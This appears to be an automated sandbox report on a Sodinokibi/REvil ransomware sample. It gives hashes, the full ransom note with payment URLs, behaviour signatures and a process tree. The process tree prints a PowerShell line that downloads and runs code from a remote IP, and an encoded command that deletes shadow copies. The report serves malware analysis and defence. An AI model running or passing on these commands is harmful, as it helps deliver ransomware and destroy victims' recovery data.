Analysis

  • max time kernel
    140s
  • max time network
    157s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    18-05-2020 23:10

General

  • Target

    b71c043af8f45374f5ca116e7598709d.bat

  • Size

    222B

  • MD5

    edd27812c2073dd84df03f0e332fba8a

  • SHA1

    7a5318c5bfd563fe7c2d8a3ca493961d37b5c076

  • SHA256

    d32f80b58503753e6a98d745f346b8b3f7735a7785be75a43cb49086d96b92ab

  • SHA512

    51c15579a8aec27f543983d6e6543b828156b4ebd8fa7c53b3d4a6ca802f21e69603bd5fc1f3ecbddad1873c6796f291a6a898291509b5fb752f813c71dae7eb

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/b71c043af8f45374f5ca116e7598709d

Extracted

Path

C:\gcw8z1-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension gcw8z1. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B61E5FB60667EA5B 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/B61E5FB60667EA5B Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: EwALyZ/34WLQKUUJrgZyVnLhDpHmb7HhoMSLwc2tnKXim6qWTw5qnxY1hEL0/nNr iy32bf2Jt/TdQyOLH0buyj+tjSO3gc7z1F/PK8VtX6vu2G5K34u67JHNC35UMPpO GEq1vhDPo3WWYIitKwvZrGa+h/0ay/V7+FAVoomFGJiD+F2VPsSkmQhdjRVAJkYQ ItrhMOmzizmiujYhZ13TkLErSMXOS5EI3uq5g/aSRxZrmemmnu1/oLGN5+N9Bsfs mNrUkSW5MRQ2dXAjV3AXeNJpTn++Ijfh+nsk9+qJ0RwscW8kmAA7wdgJ2o4JDbmY +sifLdBZWMsAkjBefbBuXTm9+Tz6E353rzijmW6IsshTbUQ/uXNf/Llh7TrokCNt lySlEGTxxE4hhkA5hZs/ikeMBpwP7gXuY2ZRLGNRptfZjitDPChHfegknzWllfHI JeazU0cX1mCINipML1MkduPYcwfAcEnPwt7z/NTEc++52gvH30+s4JiTtKKCYBRN IX2FSkO5IZj0D49GrTNJxe1vLQL5mAS0a1D/lAO2IHgTC/HpuEIrElXEalENnmMc l8Kfr4wUJgEhfc4CO3fGSX1uUUgp+48QZI/UKjDeFyzK8cH19KJRfOfzVOl3byFL Iu2dEevmuZxfxjKx0KX21xOfBBulouca7rfYafCwicofIYjsU3fcldRIcw9mVWzq kV928tSn9k3mH/HH/3LYo5z6YZKuCV0hg29+gpFoAQLTFVeVXt/YaoOz82TzAVJO DPuGbW4lPbtLm0a+0ws0UGkghbDzNGHF4gWHKa29xXvphnIKnzvRMdNREEIzDPbs Dedoddqeg+s0aWfMHDYzjZt+fR6zarYPXVGRLGabBJmVuVMqNJc8F6NweXMmcdtv SSAMbQ6VSPVukiENl6xYWs/qjpNkgkpGRUJIT6hTwdkjgR43MyQV2xfPVGOVyoVK pdK9hYcvU7SyY/UMXBoMwoTSjL6n3cExDp9EqrxCMJZkekuDlNJkDC6T/RGiK9w1 RCGazxoTnTjLG7KxQu+dtObA7Yd/cKGaREpPVXMeOsQMAVQ89IBzlHgutZzJ6CHl jDIlJiIXk/niDrmoEUQAMFQFHCB68YMwD0G+OT5M3rJr0s24YRjinw3rqd+1/dLY rfYK4Jgs3HYgkdbyQ0eya5PhwAW2OF5dO7tNeKMz6XR9bDdFcvmNVOb+YtCk9L/O Y81ExymZEpui7x8KbCxRgv1dLNQWgUmgGJrrUGzV8SMaUC+LrklPt6TnpA0SXFJI VvRVlZOKoBkgBWYi+e0lW+OrRcfqrNNB99yTzjJQJVA= ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B61E5FB60667EA5B

http://decryptor.cc/B61E5FB60667EA5B

Signatures

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 77 IoCs
  • Enumerates connected drives 3 TTPs
  • Modifies service 2 TTPs 4 IoCs
  • Drops file in Program Files directory 28 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Modifies system certificate store 2 TTPs 12 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Blacklisted process makes network request 116 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\b71c043af8f45374f5ca116e7598709d.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:676
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/b71c043af8f45374f5ca116e7598709d');Invoke-VWYAUDKVHNECJLN;Start-Sleep -s 10000"
      2⤵
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of WriteProcessMemory
      • Suspicious behavior: EnumeratesProcesses
      • Drops file in Program Files directory
      • Sets desktop wallpaper using registry
      • Drops file in System32 directory
      • Modifies system certificate store
      • Suspicious use of AdjustPrivilegeToken
      • Blacklisted process makes network request
      PID:784
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1792
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:560

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2f8f6cc7-ae83-4f79-b06e-2b9a49e06c5b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3f934678-4276-4d7d-9a2b-7ccacecf398b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_670419ca-9b90-4e9d-a6c5-f73b7563d382

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9065e065-05e7-4eaa-bb93-1db6da178e99

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3b7b651-7089-41b5-9155-3fb877609508

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b7a807a3-f6b6-4397-972a-e9e81988f869

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms